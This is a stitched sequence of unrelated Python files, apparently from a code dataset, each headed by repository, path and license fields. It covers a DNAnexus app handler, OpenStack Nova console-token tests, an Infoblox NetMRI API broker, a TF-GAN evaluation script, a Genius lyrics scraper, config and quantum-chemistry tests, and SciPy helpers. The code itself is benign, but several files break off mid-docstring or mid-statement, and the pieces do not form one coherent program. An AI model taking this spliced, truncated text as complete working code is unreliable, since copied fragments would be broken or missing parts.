# These are optional keys for apps, not sure what to do with them
_app_optional_keys = ['description', 'developerNotes', 'details',
'categories', 'resources', 'access']
_app_describe_output_keys = []
_app_cleanup_keys = ['name', 'title', 'summary', 'dxapi', 'openSource',
'version', 'runSpec', 'developers', 'authorizedUsers']
class DXApp(DXObject, DXExecutable):
'''
Remote app object handler.
'''
_class = "app"
def __init__(self, dxid=None, name=None, alias=None):
DXObject.__init__(self)
if dxid is not None or name is not None:
self.set_id(dxid=dxid, name=name, alias=alias)
def set_id(self, dxid=None, name=None, alias=None):
'''
:param dxid: App ID
:type dxid: string
:param name: App name
:type name: string
:param alias: App version or tag
:type alias: string
:raises: :exc:`~dxpy.exceptions.DXError` if *dxid* and some other input are both given or if neither *dxid* nor *name* are given
Discards the currently stored ID and associates the handler
with the requested parameters. Note that if *dxid* is given,
the other fields should not be given, and if *name* is given,
*alias* has default value "default".
'''
self._dxid = None
self._name = None
self._alias = None
if dxid is not None:
if name is not None or alias is not None:
raise DXError("Did not expect name or alias to be given if dxid is given")
verify_string_dxid(dxid, self._class)
self._dxid = dxid
elif name is not None:
self._name = name
if not isinstance(name, basestring):
raise DXError("App name needs to be a string: %r" % (name,))
if alias is not None:
if not isinstance(alias, basestring):
raise DXError("App alias needs to be a string: %r" % (alias,))
self._alias = alias
else:
self._alias = 'default'
def get_id(self):
'''
:returns: Object ID of associated app
:rtype: string
Returns the object ID of the app that the handler is currently
associated with.
'''
if self._dxid is not None:
return self._dxid
else:
return 'app-' + self._name + '/' + self._alias
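    # Illustrative note (not part of the original file), based on set_id()/get_id()
    # above: a handler can address an app either by ID or by name plus version/tag.
    # The names below are hypothetical:
    #   DXApp(name="myapp", alias="1.0.0").get_id()  # -> "app-myapp/1.0.0"
    #   DXApp(name="myapp").get_id()                 # -> "app-myapp/default"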
def new(self, **kwargs):
'''
:param initializeFrom: ID of an existing app object from which to initialize the app
:type initializeFrom: string
:param applet: ID of the applet that the app will be created from
:type applet: string
:param name: Name of the app (inherits from *initializeFrom* if possible)
:type name: string
:param title: Title or brand name of the app (optional)
:type title: string
:param summary: A short description of the app (optional)
:type summary: string
:param description: An extended description of the app (optional)
:type description: string
:param details: Arbitrary JSON to be associated with the app (optional)
:type details: dict or list
:param version: Version number
:type version: string
:param bill_to: ID of the user or organization who will own the app and be billed for its space usage (optional if a
|
n app with this name already exists)
:type bill_to: string
:param access: Access specification (optional)
:type access: dict
        :param resources: Specifies what is to be put into the app's resources container. Must be a string containing a project ID, or a list containing object IDs. (optional)
:type resources: string or list
.. note:: It is highly recommended that the higher-level module
:mod:`dxpy.app_builder` or (preferably) its frontend `dx build --create-app
<https://wiki.dnanexus.com/Command-Line-Client/Index-of-dx-Commands#build>`_
be used instead for app creation.
Creates an app with the given parameters by using the specified
applet or app as a base and overriding its attributes. See the
API documentation for the `/app/new
<https://wiki.dnanexus.com/API-Specification-v1.0.0/Apps#API-method%3A-%2Fapp%2Fnew>`_
method for more info.
Exactly one of *initializeFrom* and *applet* must be provided.
The app is only available to its developers until
:meth:`publish()` is called, and is not run until :meth:`run()`
is called.
'''
dx_hash = {}
if 'applet' not in kwargs and 'initializeFrom' not in kwargs:
raise DXError("%s: One of the keyword arguments %s and %s is required" % (self.__class__.__name__, 'applet', 'initializeFrom'))
for field in ['version']:
if field not in kwargs:
raise DXError("%s: Keyword argument %s is required" % (self.__class__.__name__, field))
dx_hash[field] = kwargs[field]
del kwargs[field]
for field in 'initializeFrom', 'applet', 'name', 'title', 'summary', 'description', 'billing', 'access', 'resources':
if field in kwargs:
dx_hash[field] = kwargs[field]
del kwargs[field]
if "bill_to" in kwargs:
dx_hash['billTo'] = kwargs['bill_to']
del kwargs["bill_to"]
resp = dxpy.api.app_new(dx_hash, **kwargs)
self.set_id(dxid=resp["id"])
def describe(self, fields=None, **kwargs):
'''
:param fields: Hash where the keys are field names that should be returned, and values s
|
ntt-sic/nova
|
nova/tests/consoleauth/test_consoleauth.py
|
Python
|
apache-2.0
| 7,413
| 0.001349
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 OpenStack Foundation
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Tests for Consoleauth Code.
"""
import mox
from nova.consoleauth import manager
from nova import context
from nova import db
from nova.openstack.common import timeutils
from nova import test
class ConsoleauthTestCase(test.TestCase):
"""Test Case for consoleauth."""
def setUp(self):
super(ConsoleauthTestCase, self).setUp()
self.manager = manager.ConsoleAuthManager()
self.context = context.get_admin_context()
self.instance = db.instance_create(self.context, {})
def test_tokens_expire(self):
# Test that tokens expire correctly.
self.useFixture(test.TimeOverride())
token = u'mytok'
self.flags(console_token_ttl=1)
self._stub_validate_console_port(True)
self.manager.authorize_console(self.context, token, 'novnc',
'127.0.0.1', '8080', 'host',
self.instance['uuid'])
self.assertTrue(self.manager.check_token(self.context, token))
timeutils.advance_time_seconds(1)
self.assertFalse(self.manager.check_token(self.context, token))
def _stub_validate_console_port(self, result):
def fake_validate_console_port(ctxt, instance, port, console_type):
return result
self.stubs.Set(self.manager.compute_rpcapi,
'validate_console_port',
fake_validate_console_port)
def test_multiple_tokens_for_instance(self):
tokens = [u"token" + str(i) for i in xrange(10)]
self._stub_validate_console_port(True)
for token in tokens:
self.manager.authorize_console(self.context, token, 'novnc',
'127.0.0.1', '8080', 'host',
self.instance['uuid'])
for token in tokens:
self.assertTrue(self.manager.check_token(self.context, token))
def test_delete_tokens_for_instance(self):
tokens = [u"token" + str(i) for i in xrange(10)]
for token in tokens:
self.manager.authorize_console(self.context, token, 'novnc',
'127.0.0.1', '8080', 'host',
self.instance['uuid'])
self.manager.delete_tokens_for_instance(self.context,
self.instance['uuid'])
stored_tokens = self.manager._get_tokens_for_instance(
self.instance['uuid'])
self.assertEqual(len(stored_tokens), 0)
for token in tokens:
self.assertFalse(self.manager.check_token(self.context, token))
def test_wrong_token_has_port(self):
token = u'mytok'
self._stub_validate_console_port(False)
self.manager.authorize_console(self.context, token, 'novnc',
'127.0.0.1', '8080', 'host',
instance_uuid=self.instance['uuid'])
self.assertFalse(self.manager.check_token(self.context, token))
def test_console_no_instance_uuid(self):
self.manager.authorize_console(self.context, u"token", 'novnc',
'127.0.0.1', '8080', 'host',
instance_uuid=None)
self.assertFalse(self.manager.check_token(self.context, u"token"))
def test_delete_expired_tokens(self):
self.useFixture(test.TimeOverride())
token = u'mytok'
self.flags(console_token_ttl=1)
self._stub_validate_console_port(True)
self.manager.authorize_console(self.context, token, 'novnc',
'127.0.0.1', '8080', 'host',
self.instance['uuid'])
timeutils.advance_time_seconds(1)
self.assertFalse(self.manager.check_token(self.context, token))
token1 = u'mytok2'
self.manager.authorize_console(self.context, token1, 'novnc',
'127.0.0.1', '8080', 'host',
self.instance['uuid'])
stored_tokens = self.manager._get_tokens_for_instance(
self.instance['uuid'])
        # when trying to store token1, the expired token is removed first.
self.assertEqual(len(stored_tokens), 1)
self.assertEqual(stored_tokens[0], token1)
class ControlauthMemcacheEncodingTestCase(test.TestCase):
def setUp(self):
super(ControlauthMemcacheEncodingTestCase, self).setUp()
self.manager = manager.ConsoleAuthManager()
self.context = context.get_admin_context()
self.u_token = u"token"
self.u_instance = u"instance"
def test_authorize_console_encoding(self):
self.mox.StubOutWithMock(self.manager.mc, "set")
self.mox.StubOutWithMock(self.manager.mc, "get")
self.manager.mc.set(mox.IsA(str), mox.IgnoreArg(), mox.IgnoreArg()
).AndReturn(True)
self.manager.mc.get(mox.IsA(str)).AndReturn(None)
self.manager.mc.set(mox.IsA(str), mox.IgnoreArg()).AndReturn(True)
self.mox.ReplayAll()
self.manager.authorize_console(self.context, self.u_token, 'novnc',
'127.0.0.1', '8080', 'host',
self.u_instance)
def test_check_token_encoding(self):
self.mox.StubOutWithMock(self.manager.mc, "get")
self.manager.mc.get(mox.IsA(str)).AndReturn(None)
self.mox.ReplayAll()
self.manager.check_token(self.context, self.u_token)
def test_delete_tokens_for_instance_encoding(self):
self.mox.StubOutWithMock(self.manager.mc, "delete")
self.mox.StubOutWithMock(self.manager.mc, "get")
self.manager.mc.get(mox.IsA(str)).AndReturn('["token"]')
self.manager.mc.delete(mox.IsA(str)).AndReturn(True)
self.manager.mc.delete(mox.IsA(str)).AndReturn(True)
self.mox.ReplayAll()
        self.manager.delete_tokens_for_instance(self.context, self.u_instance)
class CellsConsoleauthTestCase(ConsoleauthTestCase):
"""Test Case for consoleauth w/ cells enabled."""
def setUp(self):
super(CellsConsoleauthTestCase, self).setUp()
self.flags(enable=True, group='cells')
def _stub_validate_console_port(self, result):
def fake_validate_console_port(ctxt, instance_uuid, console_port,
console_type):
return result
        self.stubs.Set(self.manager.cells_rpcapi,
'validate_console_port',
fake_validate_console_port)
|
infobloxopen/infoblox-netmri
|
infoblox_netmri/api/broker/v3_8_0/issue_detail_broker.py
|
Python
|
apache-2.0
| 78,423
| 0.002193
|
from ..broker import Broker
class IssueDetailBroker(Broker):
controller = "issue_details"
def show(self, **kwargs):
"""Shows the details for the specified issue detail.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param IssueID: The internal NetMRI identifier for this issue instance.
:type IssueID: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of issue detail methods. The listed methods will be called on each issue detail returned and included in the output. Available methods are: data_source, device, interface, iprg, vlan, subnet, alternate_device, issue_desc, title, severity, infradevice.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: data_source, device, interface, iprg, vlan, subnet, alternate_device, issue_desc.
:type include: Array of String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return issue_detail: The issue detail identified by the specified IssueID.
:rtype issue_detail: IssueDetail
"""
return self.api_request(self._get_method_fullname("show"), kwargs)
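    # Illustrative note (not part of the original broker): with a broker instance
    # wired to an API client, a call following the docstring above might look like
    # (the IssueID value and the extra methods are hypothetical):
    #   detail = issue_details_broker.show(IssueID=1234, methods=['device', 'severity'])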
def index(self, **kwargs):
"""Lists the available issue details. Any of the inputs listed may be be used to narrow the list; other inputs will be ignored. Of the
|
various ways to query lists, using this method is most efficient.
**Inputs**
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
            :param BatchID: The internal NetMRI identifier for the job execution batch to which this issue applies, if relevant.
:type BatchID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param BatchID: The internal NetMRI identifier for the job execution batch to which this issue applies, if relevant.
:type BatchID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceID: The internal NetMRI identifier for the device to which this issue applies.
:type DeviceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceID: The internal NetMRI identifier for the device to which this issue applies.
:type DeviceID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param EndTime: The ending effective time of this revision of this record, or empty if still in effect.
:type EndTime: DateTime
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param EndTime: The ending effective time of this revision of this record, or empty if still in effect.
:type EndTime: Array of DateTime
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param InterfaceID: The internal NetMRI identifier for the interface to which this issue applies, if relevant.
:type InterfaceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param InterfaceID: The internal NetMRI identifier for the interface to which this issue applies, if relevant.
:type InterfaceID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param IprgID: The internal NetMRI identifier for the HSRP or VRRP group to which this issue applies, if relevant.
:type IprgID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param IprgID: The internal NetMRI identifier for the HSRP or VRRP group to which this issue applies, if relevant.
:type IprgID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param IssueID: The internal NetMRI identifier for this issue instance.
:type IssueID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param IssueID: The internal NetMRI identifier for this issue instance.
:type IssueID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param IssueTypeID: An internal NetMRI identifier for the type of this issue.
:type IssueTypeID: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param IssueTypeID: An internal NetMRI identifier for the type of this issue.
:type IssueTypeID: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param SubnetID: The internal NetMRI identifier for the subnet to which this issue applies, if relevant.
:type SubnetID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param SubnetID: The internal NetMRI identifier for the subnet to which this issue applies, if relevant.
:type SubnetID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param Timestamp: The date and time this record was collected or calculated.
:type Timestamp: DateTime
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param Timestamp: The date and time this record was collected or calculated.
:type Timestamp: Array of DateTime
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param VlanID: The internal NetMRI identifier of the VLAN to which this issue applies, if relevant.
:type VlanID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param VlanID: The internal NetMRI identifier of the VLAN to which this issue applies, if relevant.
:type VlanID: Array of In
|
tensorflow/gan
|
tensorflow_gan/examples/mnist/infogan_eval.py
|
Python
|
apache-2.0
| 2,490
| 0.001606
|
# coding=utf-8
# Copyright 2022 The TensorFlow GAN Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Evaluates an InfoGAN TFGAN trained MNIST model.
The image visualizations, as in https://arxiv.org/abs/1606.03657, show the
effect of varying a specific latent variable on the image. Each visualization
focuses on one of the three structured variables. Columns have two of the three
variables fixed, while the third one is varied. Different rows have different
random samples from the remaining latents.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl import app
from absl import flags
import tensorflow.compat.v1 as tf
from tensorflow_gan.examples.mnist import infogan_eval_lib
flags.DEFINE_string('checkpoint_dir', '/tmp/mnist/',
'Directory where the model was written to.')
flags.DEFINE_string('eval_dir', '/tmp/mnist/',
'Directory where the results are saved to.')
flags.DEFINE_integer(
'noise_samples', 6,
'Number of samples to draw from the continuous structured '
'noise.')
flags.DEFINE_integer('unstructured_noise_dims', 62,
'The number of dimensions of the unstructured noise.')
flags.DEFINE_integer('continuous_noise_dims', 2,
'The number of dimensions of the continuous noise.')
flags.DEFINE_integer(
'max_number_of_evaluations', None,
'Number of times to run evaluation. If `None`, run '
'forever.')
flags.DEFINE_boolean('write_to_disk', True, 'If `True`, run images to disk.')
FLAGS = flags.FLAGS
def main(_):
hparams = infogan_eval_lib.HParams(
FLAGS.checkpoint_dir, FLAGS.eval_dir, FLAGS.noise_samples,
FLAGS.unstructured_noise_dims, FLAGS.continuous_noise_dims,
FLAGS.max_number_of_evaluations,
FLAGS.write_to_disk)
infogan_eval_lib.evaluate(hparams, run_eval_loop=True)
if __name__ == '__main__':
tf.disable_v2_behavior()
app.run(main)
|
iluxonchik/lyricist
|
lyricist/rapgenius/rgartist.py
|
Python
|
mit
| 5,427
| 0.006633
|
import re
from bs4 import BeautifulSoup
from ..const import constant
from ..bsopener import BSOpener
class RGArtist(object):
"""RapGeniusArtist"""
class _Const(object):
""" Contains constants used in outter class """
@constant
def RG_ARTIST_BASE_URL():
return "http://genius.com/artists/"
@constant
def RG_ARTIST_SONGS_BASE_URL():
return "http://genius.com/artists/songs?for_artist_page="
@constant
def RG_ARTIST_PAGENUM_PREF():
""" Prefix for page number """
return "&page="
def __init__(self, artist_url):
self.CONST = self._Const()
self.urlopener = BSOpener()
self.artist_url = artist_url
self.artist_id = self._get_artist_id(self.artist_url) # numerical artist id
self.artist_songs = self.CONST.RG_ARTIST_SONGS_BASE_URL + self.artist_id
@classmethod
def from_artist_name(cls, artist_name):
""" Returns a new instance of RGArtist from artist name
Assumes that the artist url is in the form
http://genius.com/artists/<artist_name>, where
<artist_name> is the artist_name provided as an
        argument with spaces replaced by "-" and "." removed. This method might return
        a bogus url, since RapGenius doesn't seem to be following any convention for
the names (for example, sometimes "." in names simply get removed, while in
other instances they get replaced by "-").
"""
return RGArtist(cls._Const().RG_ARTIST_BASE_URL + artist_name.replace(" ", "-").replace(".", ""))
def _get_artist_id(self, artist_url):
""" Returns the numeric id of the artist """
bsObj = self.urlopener.bsopen(artist_url)
content_val = bsObj.find("meta", {"property":"twitter:app:url:iphone"}).attrs["content"]
return re.findall("[0-9]+$", content_val)[0]
def _get_songs_BSObj(self, page_num=1):
""" Returns a list of song BeautifulSoup objects
The returned list contains the <li>'s of each song, the song url and other info,
such as the song title, can be extracted from it.
Returns:
list: list of song BeautifulSoup objects if there is at least one song on the page
None: if there are no songs on the page
"""
page_url = self.artist_songs + self.CONST.RG_ARTIST_PAGENUM_PREF + str(page_num)
print("Page url = " + page_url)
bsObj = self.urlopener.bsopen(page_url)
song_container = bsObj.find("ul", {"class":["song_list", "primary_list"]})
if song_container is None:
return None # no songs found on the page
return song_container.findAll("li")
def _get_song_text_BSObj(self, song_url):
""" Returns BeautifulSoup object with the lyrics content """
bsObj = self.urlopener.bsopen(song_url)
return bsObj.find("lyrics", {"class":"lyrics"}).find("p") if bsObj is not None else None
def get_song_urls(self, page_num=1):
""" Return a list of song urls from page page_num.
Returns:
list: list of song urls (as strings) if there is at least one song on the page
None: if there are no songs on the page
"""
bsObj_list = self._get_songs_BSObj(page_num)
if bsObj_list is None:
return None # no songs found on the page
song_urls = [] # contains the list of song urls found on the page
# not using list comprehension because we want to filter out None's
for bsObj in bsObj_list:
anchor = bsObj.find("a", {"class":"song_link"})
# make sure that we don't include any None's in our urls list
if anchor is not None:
url = anchor.attrs["href"]
if url is not None:
song_urls += [url]
# we don't want to return empty lists
return song_urls if len(song_urls) > 0 else None
def get_songs_title(self, page_num=1):
""" Return a list of song titles from page page_num.
Returns:
list: list of song titles (as strings) if there is at least one song on the page
None: if there are no songs on the page
"""
bsObj_list = self._get_songs_BSObj(page_num)
if bsObj_list is None:
return None # no songs found on the page
song_titles = [] # contains the list of song titles found on the page
# not using list comprehension because we want to filter out None's
for bsObj in bsObj_list:
span = bsObj.find("span", {"class":"song_title"})
# make sure that we don't include any None's or empty strings in our titles list
if span not in [None, ""]:
title = span.get_text()
if title is not None:
song_titles += [title]
# we don't want to return empty lists
return song_titles if len(song_titles) > 0 else None
def get_song_text(self, url):
""" Returns song text as a string """
result = ""
bsObj = self._get_song_text_BSObj(url)
return "".join(bsObj.find_all(text=True)) if bsObj is not None else ""
def get_song_title(self, url):
""" Returns song title as a string """
pass
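def _demo_rgartist():
    # Hedged usage sketch (not part of the original file, helper name is ours):
    # drives the scraper defined above end-to-end. The artist name is
    # hypothetical and the Genius page layout this class depends on may have
    # changed, so treat the calls below as illustrative only.
    artist = RGArtist.from_artist_name("Kendrick Lamar")
    urls = artist.get_song_urls(page_num=1) or []
    titles = artist.get_songs_title(page_num=1) or []
    for title, url in zip(titles, urls):
        print(title + " -> " + url)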
|
heineman/algorithms-nutshell-2ed
|
PythonCode/test/__init__.py
|
Python
|
mit
| 199
| 0.025126
|
__all__ = ["test_avl", "test_binary", "test_bloom", "test_fortune", "test_hashtable",
           "test_kd", "test_kd_factory", "test_knapsack", "test_mergesort", "test_quad",
           "test_R"]
|
jwir3/transgression
|
src/transgression/test/test_config.py
|
Python
|
mpl-2.0
| 4,338
| 0.011296
|
import os
import sys
sys.path.insert(0,os.path.abspath(__file__+"/../.."))
import unittest
import json
from transgression import config
class ConfigTest(unittest.TestCase):
def setUp(self):
self.mJsonString = open(os.path.abspath(os.path.dirname(os.path.realpath(__file__))+"/data/testConfig.json"), 'r').read()
def test_configuration_construction(self):
configObj = json.loads(self.mJsonString, object_hook=config.config_decoder)
self.assertTrue(configObj.hasApplication('Jingit'))
self.assertEquals('Jingit', configObj.getApplication('Jingit').getAppName())
self.assertEquals('air.com.jingit.mobile', configObj.getApplication('Jingit').getPlatformConfiguration('android').getProcessName())
self.assertEquals(2009, configObj.getApplication('Jingit').getPlatformConfiguration('android').getFirstBinaryDate().year)
self.assertEquals('sftp', configObj.getApplication('Jingit').getPlatformConfiguration('android').getBinaryRepository().getProtocol())
self.assertEquals('jenkinsmonkey.local/APKS/%year%-%month%-%day%/%time%/%commitid%/%appname%-debug-%buildnumber%.apk', configObj.getApplication('Jingit').getPlatformConfiguration('android').getBinaryRepository().getLocationFormatString())
def test_configuration_add_application(self):
configObj = json.loads(self.mJsonString, object_hook=config.config_decoder)
platformConfigDict = { 'windows' : { 'firstBinaryDate' : '2010-01-01', 'processName' : 'Jingit-bin', 'binaryRepository' : { 'protocol' : 'sftp', 'location': 'www.google.com'}}}
configObj.addApplication('testApp', platformConfigDict)
self.assertTrue(configObj.hasApplication('testApp'))
self.assertEquals('testApp', configObj.getApplication('testApp').getAppName())
self.assertEquals('Jingit-bin', configObj.getApplication('testApp').getPlatformConfiguration('windows').getProcessName())
self.assertEquals(2010, configObj.getApplication('testApp').getPlatformConfiguration('windows').getFirstBinaryDate().year)
self.assertEquals('sftp', configObj.getApplication('testApp').getPlatformConfiguration('windows').getBinaryRepository().getProtocol())
self.assertEquals('www.google.com', configObj.getApplication('testApp').getPlatformConfiguration('windows').getBinaryRepository().getLocationFormatString())
# def test_add_application(self):
# configObj = json.loads(self.mJsonString, object_hook=config.config_decoder)
# platformConfigDict = { 'windows' : { 'firstBinaryDate' : '2010-01-01', 'processName' : 'Jingit-bin', 'binaryRepository' : { 'protocol' : 'sftp', 'location': 'www.google.com'}}}
# configObj.addApplication('WokkaWokka', platformConfigDict)
def test_json_encoding(self):
configObj = json.loads(self.mJsonString, object_hook=config.config_decoder)
app = configObj.getApplication('Jingit')
platConfig = app.getPlatformConfiguration('android')
binRepo = platConfig.getBinaryRepository()
expectedBinaryRepoOutput = "{ 'protocol' : 'sftp', 'location' : 'jenkinsmonkey.local/APKS/%year%-%month%-%day%/%time%/%commitid%/%appname%-debug-%buildnumber%.apk'}"
self.assertEquals(expectedBinaryRepoOutput, config.BinaryRepositoryEncoder.encode(binRepo))
self.assertEquals(expectedBinaryRepoOutput, json.dumps(binRepo, cls=config.BinaryRepositoryEncoder))
expectedPlatConfigOutput = "{ 'processName' : 'air.com.jingit.mobile', 'firstBinaryDate' : '2009-01-01', 'binaryRepository' : " + expectedBinaryRepoOutput + "}"
        self.assertEquals(expectedPlatConfigOutput, config.PlatformConfigurationEncoder.encode(platConfig))
self.assertEquals(expectedPlatConfigOutput, json.dumps(platConfig, cls=config.PlatformConfigurationEncoder))
expectedAppConfigOutput = "{ 'Jingit': { 'platformConfigurations' : { " + expectedPlatConfigOutput + "}}}"
        self.assertEquals(expectedAppConfigOutput, config.ApplicationConfigEncoder.encode(app))
self.assertEquals(expectedAppConfigOutput, json.dumps(app, cls=config.ApplicationConfigEncoder))
expectedConfigOutput = "{ '__type__' : 'transgression-configuration', 'applications' : " + expectedAppConfigOutput + "}}"
self.assertEquals(expectedConfigOutput, config.ConfigEncoder.encode(configObj))
self.assertEquals(expectedConfigOutput, json.dumps(configObj, cls=config.ConfigEncoder, indent=2))
if __name__ == '__main__':
unittest.main()
|
gkc1000/pyscf
|
pyscf/pbc/tdscf/test/test_rhf_slow.py
|
Python
|
apache-2.0
| 3,697
| 0.000541
|
from pyscf.pbc.gto import Cell
from pyscf.pbc.scf import RHF
from pyscf.pbc.tdscf import TDHF
from pyscf.pbc.tdscf.rhf_slow import PhysERI, PhysERI4, PhysERI8, TDRHF
from pyscf.tdscf.common_slow import eig
from test_common import retrieve_m, retrieve_m_hf, assert_vectors_close
import unittest
from numpy import testing
class DiamondTestGamma(unittest.TestCase):
"""Compare this (rhf_slow) vs reference (pyscf)."""
@classmethod
def setUpClass(cls):
cls.cell = cell = Cell()
# Lift some degeneracies
cell.atom = '''
C 0.000000000000 0.000000000000 0.000000000000
C 1.67 1.68 1.69
'''
cell.basis = {'C': [[0, (0.8, 1.0)],
[1, (1.0, 1.0)]]}
# cell.basis = 'gth-dzvp'
cell.pseudo = 'gth-pade'
cell.a = '''
0.000000000, 3.370137329, 3.370137329
3.370137329, 0.000000000, 3.370137329
3.370137329, 3.370137329, 0.000000000'''
cell.unit = 'B'
cell.verbose = 5
cell.build()
        cls.model_rhf = model_rhf = RHF(cell)
model_rhf.kernel()
cls.td_model_rhf = td_model_rhf = TDHF(model_rhf)
td_model_rhf.nroots = 5
td_model_rhf.kernel()
cls.ref_m_rhf = retrieve_m(td_model_rhf)
@classmethod
def tearDownClass(cls):
# These are here to remove temporary files
del cls.td_model_rhf
del cls.model_rhf
del cls.cell
def test_eri(self):
"""Tests all ERI implementations: with and without symmetries."""
for eri in (PhysERI, PhysERI4, PhysERI8):
try:
e = eri(self.model_rhf)
m = e.tdhf_full_form()
# Test matrix vs ref
testing.assert_allclose(m, retrieve_m_hf(e), atol=1e-14)
# Test matrix vs pyscf
testing.assert_allclose(self.ref_m_rhf, m, atol=1e-14)
vals, vecs = eig(m, nroots=self.td_model_rhf.nroots)
testing.assert_allclose(vals, self.td_model_rhf.e, atol=1e-5)
except Exception:
print("When testing {} the following exception occurred:".format(eri))
raise
def test_class(self):
"""Tests container behavior."""
model = TDRHF(self.model_rhf)
model.nroots = self.td_model_rhf.nroots
assert model.fast
e, xy = model.kernel()
model.fast = False
model.kernel()
# Slow vs fast
testing.assert_allclose(model.e, e)
assert_vectors_close(model.xy, xy)
# ... vs ref
testing.assert_allclose(model.e, self.td_model_rhf.e, atol=1e-12)
assert_vectors_close(model.xy, self.td_model_rhf.xy, atol=1e-12)
# Test real
testing.assert_allclose(model.e.imag, 0, atol=1e-8)
def test_cplx(self):
"""Tests whether complex conjugation is handled correctly."""
# Perform mf calculation
model_rhf = RHF(self.cell)
model_rhf.kernel()
# Add random phases
import numpy
numpy.random.seed(0)
p = numpy.exp(2.j * numpy.pi * numpy.random.rand(model_rhf.mo_coeff.shape[1]))
model_rhf.mo_coeff = model_rhf.mo_coeff * p[numpy.newaxis, :]
m_ref = PhysERI(model_rhf).tdhf_full_form()
td_model_rhf = TDRHF(model_rhf)
assert not td_model_rhf.fast
td_model_rhf.kernel()
with self.assertRaises(ValueError):
td_model_rhf.fast = True
td_model_rhf.kernel()
self.assertIsInstance(td_model_rhf.eri, PhysERI4)
m = td_model_rhf.eri.tdhf_full_form()
testing.assert_allclose(m, m_ref, atol=1e-14)
|
nmayorov/scipy
|
scipy/_lib/_util.py
|
Python
|
bsd-3-clause
| 16,576
| 0.000241
|
import functools
import operator
import sys
import warnings
import numbers
from collections import namedtuple
from multiprocessing import Pool
import inspect
import math
import numpy as np
try:
from numpy.random import Generator as Generator
except ImportError:
class Generator(): # type: ignore[no-redef]
pass
def _lazywhere(cond, arrays, f, fillvalue=None, f2=None):
"""
np.where(cond, x, fillvalue) always evaluates x even where cond is False.
This one only evaluates f(arr1[cond], arr2[cond], ...).
Examples
--------
>>> a, b = np.array([1, 2, 3, 4]), np.array([5, 6, 7, 8])
>>> def f(a, b):
... return a*b
>>> _lazywhere(a > 2, (a, b), f, np.nan)
array([ nan, nan, 21., 32.])
Notice, it assumes that all `arrays` are of the same shape, or can be
broadcasted together.
"""
if fillvalue is None:
if f2 is None:
raise ValueError("One of (fillvalue, f2) must be given.")
else:
fillvalue = np.nan
else:
if f2 is not None:
raise ValueError("Only one of (fillvalue, f2) can be given.")
arrays = np.broadcast_arrays(*arrays)
temp = tuple(np.extract(cond, arr) for arr in arrays)
tcode = np.mintypecode([a.dtype.char for a in arrays])
out = np.full(np.shape(arrays[0]), fill_value=fillvalue, dtype=tcode)
np.place(out, cond, f(*temp))
if f2 is not None:
temp = tuple(np.extract(~cond, arr) for arr in arrays)
np.place(out, ~cond, f2(*temp))
return out
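def _demo_lazywhere_f2():
    # Illustrative sketch (not part of the original module, helper name is
    # ours): instead of a constant fillvalue, a second callable f2 can supply
    # the values where cond is False.
    a = np.array([1.0, 2.0, 3.0, 4.0])
    b = np.array([5.0, 6.0, 7.0, 8.0])
    # f is used where a > 2, f2 elsewhere -> array([ 6.,  8., 21., 32.])
    return _lazywhere(a > 2, (a, b), f=lambda x, y: x * y, f2=lambda x, y: x + y)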
def _lazyselect(condlist, choicelist, arrays, default=0):
"""
Mimic `np.select(condlist, choicelist)`.
Notice, it assumes that all `arrays` are of the same shape or can be
